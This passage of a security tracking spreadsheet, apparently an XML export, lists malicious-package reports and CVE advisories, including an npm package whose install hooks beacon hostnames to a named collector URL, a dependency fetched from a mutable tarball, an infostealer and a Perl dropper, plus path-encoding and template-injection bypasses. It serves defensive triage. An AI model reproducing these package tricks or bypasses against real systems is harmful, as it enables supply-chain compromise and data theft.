        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17184</t>
        </is>
      </c>
      <c r="D364" s="5" t="inlineStr"/>
      <c r="E364" s="5" t="inlineStr"/>
      <c r="F364" s="5" t="inlineStr"/>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>npm, typescript</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>npm:@airbnb-extended/typescript-config</t>
        </is>
      </c>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr"/>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8424e4bf8731b950511535a2cb9b41b0bedba02092a73ea304b6730f04aa95fe)
package.json for @airbnb-extended/typescript-config@99.9.1 declares a dependency `ltidisafe` sourced from a bare HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.7.8.tgz) instead of a registry version range. On `npm install`, npm fetches and installs whatever bytes that URL returns, executing any lifecycle scripts inside the fetched tarball. The source is unpinned by integrity hash, is not the npm registry, and is unrelated to any Airbnb-published infrastructure. The scope/name also mimics the well-known `@airbnb/typescript-config` package, and the version `99.9.1` is implausibly high — a dependency-confusion / lure shape designed to win resolution against a legitimate internal or public package. The tarball URL is mutable by whoever controls the storage bucket, so the delivered payload can change at any time.
</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17184</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17185</t>
        </is>
      </c>
      <c r="D365" s="5" t="inlineStr"/>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="inlineStr"/>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr">
        <is>
          <t>npm:shoplist-app</t>
        </is>
      </c>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr"/>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fdceadb01f08162934382b121e813236b86adc0d4d74b7b2f062c78e529c34f6)
shoplist-app@99.99.99 is a dependency-confusion / typosquat beacon. preinstall.js is wired into every lifecycle hook (preinstall, install, postinstall, prepare, prepublish) and issues an HTTPS GET to the hardcoded endpoint https://eo8f3m3ho26a0nm.m.pipedream.net/, transmitting the installer's machine hostname via os.hostname() (smuggled into a `host` HTTP header) together with package identity in the query string. index.js — the package `main` — independently fires a second HTTPS GET to the same Pipedream collector at require/import time, carrying os.platform() and a `trigger=runtime` marker. The package ships no functional code beyond these beacons; its version (99.99.99) and description ("test") are consistent with a name-squat probe designed to identify which internal build hosts resolve the name shoplist-app. The exfiltrated data (hostname, OS platform, package-name confirmation) gives the operator of the Pipedream endpoint a map of environments where a shoplist-app dependency reference successfully resolves to this public package — the standard reconnaissance stage of a dependency-confusion attack.
</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17185</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17187</t>
        </is>
      </c>
      <c r="D366" s="5" t="inlineStr"/>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="inlineStr"/>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr">
        <is>
          <t>npm:@digift/cli</t>
        </is>
      </c>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr"/>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (5508ba462afd4a4d6f311cca1a00d728ea27b8fe03a2fba93878a9fabbb7f309)
The OpenSSF Package Analysis project identified '@digift/cli' @ 99.99.100 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17187</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17188</t>
        </is>
      </c>
      <c r="D367" s="5" t="inlineStr"/>
      <c r="E367" s="5" t="inlineStr"/>
      <c r="F367" s="5" t="inlineStr"/>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>PyPI:sherpy</t>
        </is>
      </c>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr"/>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (2e5440f1e24545fd14e73c7fc459a9abf893f4674683899ed29ff7c4189416b6)
When used, the package exfiltrates Chrome extension files (likely targeting cryptocurrency wallets) and sensitive Telegram files.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-sherpy
Reasons (based on the campaign):
 - infostealer
 - exfiltration-crypto
 - target:telegram
 - native-extension
</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17188</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65660</t>
        </is>
      </c>
      <c r="D368" s="5" t="inlineStr"/>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="inlineStr"/>
      <c r="G368" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H368" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I368" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr"/>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr"/>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Microsoft SharePoint contains a code injection vulnerability which could allow an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65660</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97230</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>IO::Socket::SSL::SelfCertificate versions 1.00 for Perl contains malware which executes Python code from an obfuscated URL.
The generate_certificate runs a Python script saved as a certificate file.  The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated with base64 encoding and run the response body directly.
The impact is that arbitrary code can be invoked as the user, without a dropped script being saved on the affected host.
The releases have no test scripts nor build hooks.  The intention may have been to trigger the payload after installation.
The dropper script is in lib/Crypt/SelfCertificate/sample/cert.pem.
This is similar to CVE-2026-95831 for the module Crypt::SelfCertificate.
The SHA-256 digests of the files are
    ba24ee8ec3b7f47f65bed62e16fb413ace50653cf44bd8ea90914390922831e0  IO-Socket-SSL-SelfCertificate-1.00.tar.gz
    821d38830e5eb8607738421c25ac25f59fff02a6ab67daa32fbd020429454dac  IO-Socket-SSL-SelfCertificate-1.00/lib/IO/Socket/SSL/SelfCertificate/sample/cert.pem
    d483cb7b23b7271cb11cf242bff4a2e1c02df0b9525eb0429abeea8961c399d5  IO-Socket-SSL-SelfCertificate-1.00-upload.tar.gz</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97230</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88361</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>SumatraPDF 3.6.1 contains an integer overflow vulnerability in EngineMupdf::BuildPageLabelRec() when parsing PDF PageLabels /Nums entries.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88361</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53493</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M371" s="5" t="inlineStr">
        <is>
          <t>1.7.36, 2.0.13, 2.2.9, 2.3.6, 2.4.1</t>
        </is>
      </c>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr"/>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-834</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability exists in containerd's image pull handlers where a crafted OCI image index containing deeply nested or heavily fanned-out descriptor graphs can cause unbounded CPU and memory consumption. During the `PullImage` operation, the recursive traversal and processing of child descriptors lack sufficient depth and breadth limits, and fail to adequately deduplicate identical descriptors. This unbounded traversal leads to excessive resource allocation.
Consequently, pulling a malicious image reference can result in prolonged stalls during container creation and significant resource pressure on the host system. This issue occurs entirely during the image pull phase, prior to any container execution.
### Patches
This bug has been fixed in containerd 2.4.1, 2.3.6, 2.2.9, 2.0.13, and 1.7.36. Users should update to these versions to resolve the issue.
### Workarounds
There are no known workarounds for this issue. Users are advised to only pull trusted images from known registries until the patch can be applied.
### Credits
The containerd project would like to thank Jakub Ciolek at ElevenLabs and @jlgore who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Email us at [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53493</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95811</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-863</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Handler versions from 2.0.0 before 2.16.10, from 2.17.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow an equivalent spelling of a path to bypass the locationRules that restrict it.
The handler matches each vhost's locationRules regular expressions against REQUEST_URI, the raw request line, while the web server routes on the path it has already percent-decoded and normalized. A request that percent-encodes a character of the path, inserts dot segments, or doubles a slash therefore reaches the protected resource under a URI that no rule regexp matches, and the vhost's default rule decides access. Deny rules, identity and group conditions, and unprotect and skip rules are bypassed alike.
Only a vhost whose default rule is more permissive than its other rules is affected. An authenticated user then reaches any URL a locationRules regexp was meant to restrict, but gains no more than that default rule already grants.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95811</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97636</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>hashicorp, gin</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow HashiCorp provider: the HashiCorp Vault secrets backend's team-scope guard can be bypassed with a user-controlled key. In a multi-team deployment, a Dag author scoped to one team can supply a Variable key containing a path separator that causes the backend to resolve a secret belonging to a different team, because after the team-scoped lookup misses the backend falls back to a team-agnostic path concatenated from the unvalidated key. The Execution API Variables route accepts a path-shaped key, so this is reachable from ordinary Dag code.
Affects multi-team deployments using the HashiCorp Vault secrets backend. Single-team deployments are not affected, as there is no cross-team boundary to cross. This is the same class as CVE-2026-86465, CVE-2026-68870, CVE-2026-68871 and CVE-2026-68872 in the Akeyless, Azure Key Vault, Yandex Lockbox and Amazon secrets backends.
Users of apache-airflow-providers-hashicorp are recommended to upgrade to version 4.8.0 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97636</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97646</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. This affects an unknown function of the file admin/fun/getStudent.php. This manipulation of the argument sid causes authorization bypass. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97646</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.1)</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48543</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>express, vue, gin</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM through 2.2.6 contains a stored client-side template injection vulnerability that allows authenticated attackers to execute arbitrary JavaScript in other users' browsers by injecting Vue.js template expressions into the web form description field. Attackers can craft a web form description containing double-brace template syntax that reaches the Vue template compiler, enabling prototype chain traversal to retrieve the Function constructor and execute attacker-supplied JavaScript in the application origin for every user who views the affected web form.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48543</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97320</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. The affected element is the function AiKnowledgeDocumentServiceImpl.readUrl of the file AiKnowledgeDocumentServiceImpl.java of the component AI Knowledge Module. This manipulation of the argument url causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97320</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97325</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
